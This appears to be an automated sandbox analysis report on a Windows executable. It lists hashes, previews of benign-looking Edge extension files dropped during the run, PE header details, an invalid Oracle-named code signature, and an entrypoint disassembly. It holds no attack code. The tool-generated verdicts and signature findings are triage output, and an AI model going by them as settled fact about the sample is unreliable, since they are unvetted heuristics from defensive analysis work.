                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                        MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                        SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                        SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                                                                                                                                                                        SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\page_embed_script.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):291
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.65176400421739
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                                                                                                                                                                        MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                                                                                                                                                                        SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                                                                                                                                                                        SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                                                                                                                                                                        SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\CRX_INSTALL\service_worker_bin_prod.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):130866
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.425065147784983
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                                                                                                                                                                        MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                                                                                                                                                                        SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                                                                                                                                                                        SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                                                                                                                                                                        SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_1212932352\a6d8f9d0-fe91-4d09-8ae3-cce6505ff5d2.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):154477
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                        MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                        SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                        SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                        SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_826528400\02a859e6-7fe4-40de-ac43-f190f6420721.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):11185
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                        MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                        SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                        SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                        SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_826528400\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1753
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                        MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                        SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                        SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                        SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_826528400\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):9815
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                        MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                        SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                        SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                        SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_826528400\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):10388
                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                        MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                        SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                        SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                        SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7784_826528400\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):962
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                        MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                        SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                        SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                        SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.9874842801870445
                                                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                                                        File name:HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        File size:1'374'325 bytes
                                                                                                                                                                                                                                                                                                        MD5:3da674c87aa02f410b79109a2e5b1448
                                                                                                                                                                                                                                                                                                        SHA1:a108a3d031e70a8bc706c376115ee9f3aac91508
                                                                                                                                                                                                                                                                                                        SHA256:7f714d1fe31c0e0b58f6e98c86717c8e62dcf722513de35d25e9f31330d4027f
                                                                                                                                                                                                                                                                                                        SHA512:439396acee5012c5d1cc36bc74bbf9d1f0fe726f3f8186f66c36f4a06211d297c9d04df3247c651829cdae1dadd26a3c71c9bf75be5ad957c96a99084806f1ab
                                                                                                                                                                                                                                                                                                        SSDEEP:24576:zirwZY28AKkIJR+8O/rzY7khXyjmHWGU+tq9ljNypL5uUZg:E0Y1XzJkl/rCrdGU2CjQl5uUq
                                                                                                                                                                                                                                                                                                        TLSH:A25533818A3028FBFC754671BAF19906E7765C24BC31E2994331DAED96B67036174B33
                                                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                                                                                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                                                                                                        Icon Hash:1ee3c3e6ccd8d2c0

                                                                                                                                                                                                                                                                                                        Static PE Info

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Entrypoint:0x4038af
                                                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                                                        Digitally signed:true
                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                                                        Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973

                                                                                                                                                                                                                                                                                                        Authenticode Signature

                                                                                                                                                                                                                                                                                                        Signature Valid:false
                                                                                                                                                                                                                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                                                                        Error Number:-2146869232
                                                                                                                                                                                                                                                                                                        Not Before, Not After
                                                                                                                                                                                                                                                                                                        • 18/08/2021 20:00:00 19/08/2023 19:59:59
                                                                                                                                                                                                                                                                                                        Subject Chain
                                                                                                                                                                                                                                                                                                        • CN="Oracle America, Inc.", OU=Software Engineering, O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                                                                                                                                                                                                                                                                                                        Version:3
                                                                                                                                                                                                                                                                                                        Thumbprint MD5:2876C1BECB51837D0E3DE50903D025B6
                                                                                                                                                                                                                                                                                                        Thumbprint SHA-1:940D69C0A34A1B4CFD8048488BA86F4CED60481A
                                                                                                                                                                                                                                                                                                        Thumbprint SHA-256:EE46613A38B4F486164BCE7FB23178667715617F511B364594311A1548B08EB1
                                                                                                                                                                                                                                                                                                        Serial:068BE2F53452C882F18ED41A5DD4E7A3

                                                                                                                                                                                                                                                                                                        Entrypoint Preview

                                                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                                                        sub esp, 000002D4h
                                                                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                                                        push 00000020h
                                                                                                                                                                                                                                                                                                        xor ebp, ebp
                                                                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [00409030h]
                                                                                                                                                                                                                                                                                                        push 00008001h
                                                                                                                                                                                                                                                                                                        call dword ptr [004090B4h]
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [004092C0h]
                                                                                                                                                                                                                                                                                                        push 00000008h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                                                                        call 00007F10958BABCBh
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push 000002B4h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        push 0040A264h
                                                                                                                                                                                                                                                                                                        call dword ptr [00409184h]
                                                                                                                                                                                                                                                                                                        push 0040A24Ch
                                                                                                                                                                                                                                                                                                        push 00476AA0h
                                                                                                                                                                                                                                                                                                        call 00007F10958BA8ADh
                                                                                                                                                                                                                                                                                                        call dword ptr [004090B0h]
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        mov edi, 004CF0A0h
                                                                                                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                                                                                                        call 00007F10958BA89Bh
                                                                                                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                                                                                                        call dword ptr [00409134h]
                                                                                                                                                                                                                                                                                                        cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                                                                        mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                                                                        mov eax, edi
                                                                                                                                                                                                                                                                                                        jne 00007F10958B819Ah
                                                                                                                                                                                                                                                                                                        push 00000022h
                                                                                                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                                                                                                        mov eax, 004CF0A2h
                                                                                                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        call 00007F10958BA571h
                                                                                                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                                                                                                        call dword ptr [00409260h]
                                                                                                                                                                                                                                                                                                        mov esi, eax
                                                                                                                                                                                                                                                                                                        mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                                                                        jmp 00007F10958B8223h
                                                                                                                                                                                                                                                                                                        push 00000020h
